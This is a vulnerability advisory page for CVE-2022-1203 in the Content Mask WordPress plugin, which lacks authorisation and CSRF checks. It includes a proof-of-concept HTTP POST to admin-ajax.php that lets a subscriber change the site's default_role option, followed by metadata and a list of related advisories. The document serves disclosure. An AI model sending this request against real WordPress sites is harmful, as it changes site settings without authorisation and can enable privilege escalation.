Content Mask < 1.8.4.1 – Subscriber+ Arbitrary Options Update | CVE 2022-1203 | Plugin Vulnerabilities

Description

The plugin does not have authorisation and CSRF checks in various AJAX actions, as well as does not validate the option to be updated to ensure it belongs to the plugin. As a result, any authenticated user, such as subscriber could modify arbitrary blog options

Proof of Concept

POST /wp-admin/admin-ajax.php HTTP/1.1
Cookie: [subscriber+]
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 70
Connection: close

action=update_content_mask_option&option=default_role&value=subscriber

Affects Plugins

Fixed in 1.8.4.1

References

CVE

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

ptsfence

Submitter

ptsfence

Submitter website

https://www.ptsfence.com

Verified

Yes

WPVDB ID

3c9969e5-ca8e-4e5d-a482-c6b5c4257820

Timeline

Publicly Published

2022-05-03 (about 3 years ago)

Added

2022-05-03 (about 3 years ago)

Last Updated

2022-05-04 (about 3 years ago)

Other

Published

Title

Published

2025-05-26

Title

Property 1.0.5 - 1.0.6 - Missing Authorization to Authenticated (Author+) Privilege Escalation via property_package_user_role Metadata in PayPal Registration

Published

2025-04-04

Title

Privyr CRM <= 1.0.2 - Missing Authorization

Published

2025-11-18

Title

Email Subscribers & Newsletters < 5.9.11 - Unauthenticated Mailing Queue Trigger

Published

2025-04-01

Title

WordPress Adverts Plugin <= 1.4 - Missing Authorization

Published

2023-11-01

Title

Funnelforms Free < 3.4.2 - Missing Authorization to Arbitrary Post Duplication